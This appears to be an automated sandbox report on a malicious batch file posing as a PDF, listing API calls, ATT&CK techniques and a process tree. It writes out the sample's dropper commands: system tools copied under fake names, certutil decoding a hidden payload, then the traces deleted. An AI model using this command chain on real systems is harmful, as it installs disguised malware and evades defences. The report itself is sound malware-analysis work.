Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: textshaping.dll
Source: C:\Users\Public\kn.exe Section loaded: certcli.dll
Source: C:\Users\Public\kn.exe Section loaded: cabinet.dll
Source: C:\Users\Public\kn.exe Section loaded: cryptui.dll
Source: C:\Users\Public\kn.exe Section loaded: ncrypt.dll
Source: C:\Users\Public\kn.exe Section loaded: netapi32.dll
Source: C:\Users\Public\kn.exe Section loaded: ntdsapi.dll
Source: C:\Users\Public\kn.exe Section loaded: version.dll
Source: C:\Users\Public\kn.exe Section loaded: secur32.dll
Source: C:\Users\Public\kn.exe Section loaded: certca.dll
Source: C:\Users\Public\kn.exe Section loaded: cryptsp.dll
Source: C:\Users\Public\kn.exe Section loaded: samcli.dll
Source: C:\Users\Public\kn.exe Section loaded: logoncli.dll
Source: C:\Users\Public\kn.exe Section loaded: dsrole.dll
Source: C:\Users\Public\kn.exe Section loaded: netutils.dll
Source: C:\Users\Public\kn.exe Section loaded: sspicli.dll
Source: C:\Users\Public\kn.exe Section loaded: ntasn1.dll
Source: C:\Users\Public\kn.exe Section loaded: uxtheme.dll
Source: C:\Users\Public\kn.exe Section loaded: profapi.dll
Source: C:\Users\Public\kn.exe Section loaded: certcli.dll
Source: C:\Users\Public\kn.exe Section loaded: cabinet.dll
Source: C:\Users\Public\kn.exe Section loaded: cryptui.dll
Source: C:\Users\Public\kn.exe Section loaded: ncrypt.dll
Source: C:\Users\Public\kn.exe Section loaded: netapi32.dll
Source: C:\Users\Public\kn.exe Section loaded: ntdsapi.dll
Source: C:\Users\Public\kn.exe Section loaded: version.dll
Source: C:\Users\Public\kn.exe Section loaded: secur32.dll
Source: C:\Users\Public\kn.exe Section loaded: certca.dll
Source: C:\Users\Public\kn.exe Section loaded: cryptsp.dll
Source: C:\Users\Public\kn.exe Section loaded: samcli.dll
Source: C:\Users\Public\kn.exe Section loaded: logoncli.dll
Source: C:\Users\Public\kn.exe Section loaded: dsrole.dll
Source: C:\Users\Public\kn.exe Section loaded: netutils.dll
Source: C:\Users\Public\kn.exe Section loaded: sspicli.dll
Source: C:\Users\Public\kn.exe Section loaded: ntasn1.dll
Source: C:\Users\Public\kn.exe Section loaded: uxtheme.dll
Source: 1x40 CONTAINER.PDF-.bat Static file information: File size 3675586 > 1048576
Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1662113881.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1665632845.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1671358819.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1673888416.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000002.1677036261.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000000.1674461532.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1681056621.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1679714950.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source: Binary string: certutil.pdb source: kn.exe, 00000006.00000000.1666357084.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1669885259.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1673228008.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1671803447.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr
Source: Binary string: cmd.pdb source: alpha.exe, 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1662113881.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1665632845.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1671358819.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1673888416.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000002.1677036261.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000000.1674461532.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1681056621.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1679714950.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000006.00000000.1666357084.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1669885259.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1673228008.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1671803447.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr
Source: alpha.exe.2.dr Static PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
Source: alpha.exe.2.dr Static PE information: section name: .didat
Source: kn.exe.4.dr Static PE information: section name: .didat
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5483668 push rsp; ret 6_2_00007FF6C5483669
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\kn.exe

Boot Survival

Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\kn.exe
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\alpha.exe API coverage: 8.3 %
Source: C:\Users\Public\alpha.exe API coverage: 8.6 %
Source: C:\Users\Public\kn.exe API coverage: 0.8 %
Source: C:\Users\Public\alpha.exe API coverage: 9.6 %
Source: C:\Users\Public\alpha.exe API coverage: 8.9 %
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF755CB823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF755CB2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove
Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF755CA35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF755CA1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW
Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF755CC7B4C FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF755CB823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF755CB2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF755CA35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF755CA1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF755CC7B4C FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54CC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C553234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5533100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C55310C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5536F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5513674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54DD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C549D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54DB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54D5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5531B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C55319F8 #359,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54DDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF755CB823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF755CB2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF755CA35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF755CA1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF755CC7B4C FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF755CB823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF755CB2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF755CA35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF755CA1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF755CC7B4C FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C551511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree
Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF755CC63FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW
Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF755CB823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF755CB93B0 SetUnhandledExceptionFilter
Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF755CB8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF755CB93B0 SetUnhandledExceptionFilter
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF755CB8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5564E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C55653E0 SetUnhandledExceptionFilter
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF755CB93B0 SetUnhandledExceptionFilter
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF755CB8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF755CB93B0 SetUnhandledExceptionFilter
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF755CB8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5517024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,6_2_00007FF6C5517024
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S Jump to behavior
Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 Jump to behavior
Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 Jump to behavior
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5504AF4 GetSecurityDescriptorDacl,GetLastError,SetEntriesInAclW,SetSecurityDescriptorDacl,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,6_2_00007FF6C5504AF4
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5514E98 AllocateAndInitializeSid,GetLastError,#357,GetCurrentThread,GetLastError,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,DuplicateToken,GetLastError,CheckTokenMembership,GetLastError,CloseHandle,CloseHandle,FreeSid,6_2_00007FF6C5514E98
Source: C:\Users\Public\alpha.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,3_2_00007FF755CB51EC
Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,3_2_00007FF755CA6EE4
Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,3_2_00007FF755CB3140
Source: C:\Users\Public\alpha.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,5_2_00007FF755CB51EC
Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,5_2_00007FF755CA6EE4
Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,5_2_00007FF755CB3140
Source: C:\Users\Public\kn.exe | Code function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,6_2_00007FF6C5563800
Source: C:\Users\Public\alpha.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,9_2_00007FF755CB51EC
Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,9_2_00007FF755CA6EE4
Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,9_2_00007FF755CB3140
Source: C:\Users\Public\alpha.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,10_2_00007FF755CB51EC
Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,10_2_00007FF755CA6EE4
Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,10_2_00007FF755CB3140
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation (6 occurrences)
Source: C:\Users\Public\alpha.exe | Queries volume information: C:\ VolumeInformation (2 occurrences)
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CA6EE4 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,3_2_00007FF755CA6EE4
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C55470F4 LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LocalAlloc,LookupAccountNameW,GetLastError,ConvertSidToStringSidW,GetLastError,#357,LocalFree,LocalFree,LocalFree,6_2_00007FF6C55470F4
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CA586C GetVersion,3_2_00007FF755CA586C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C548E568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,6_2_00007FF6C548E568
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C547227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,6_2_00007FF6C547227C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5495648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,6_2_00007FF6C5495648
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54754A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,6_2_00007FF6C54754A0
MITRE ATT&CK matrix, techniques listed per tactic column (a number in parentheses is the figure the report prints next to that technique; techniques without a number are the matrix's default cells):

  • Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses
  • Resource Development: Scripting (1), Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure
  • Initial Access: Valid Accounts (2), Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise
  • Execution: Windows Management Instrumentation, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell
  • Persistence: Valid Accounts (2), Scripting (1), DLL Side-Loading (1), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
  • Privilege Escalation: Valid Accounts (2), Access Token Manipulation (21), Process Injection (11), DLL Side-Loading (1), Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
  • Defense Evasion: Masquerading (111), Valid Accounts (2), Disable or Modify Tools (2), Access Token Manipulation (21), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Install Root Certificate (1), Timestomp (1), DLL Side-Loading (1)
  • Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing
  • Discovery: System Time Discovery (1), Security Software Discovery (2), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (25), Remote System Discovery, System Owner/User Discovery, Network Sniffing, Network Service Discovery
  • Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot
  • Collection: Archive Collected Data (11), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging
  • Command and Control: Encrypted Channel (2), Junk Data, Steganography, Protocol Impersonation, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols
  • Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
  • Impact: Data Encrypted for Impact (1), Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement
Behavior Graph (the rendered graph is not included in this export; the information recoverable from it follows)

Behavior Graph ID: 1569543 | Sample: 1x40 CONTAINER.PDF-.bat | Startdate: 05/12/2024 | Architecture: WINDOWS | Score: 84

Signatures attached to the sample node: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Found large BAT file; 2 other signatures

Process tree:

  • cmd.exe (started)
  • cmd.exe started extrac32.exe; dropped file: C:\Users\Public\alpha.exe, PE32+; signatures: Drops PE files to the user root directory; Drops or copies certutil.exe with a different name (likely to bypass HIPS); Drops or copies cmd.exe with a different name (likely to bypass HIPS)
  • cmd.exe started alpha.exe, which started kn.exe; signature on kn.exe: Registers a new ROOT certificate
  • cmd.exe started alpha.exe, which started extrac32.exe; dropped file: C:\Users\Public\kn.exe, PE32+
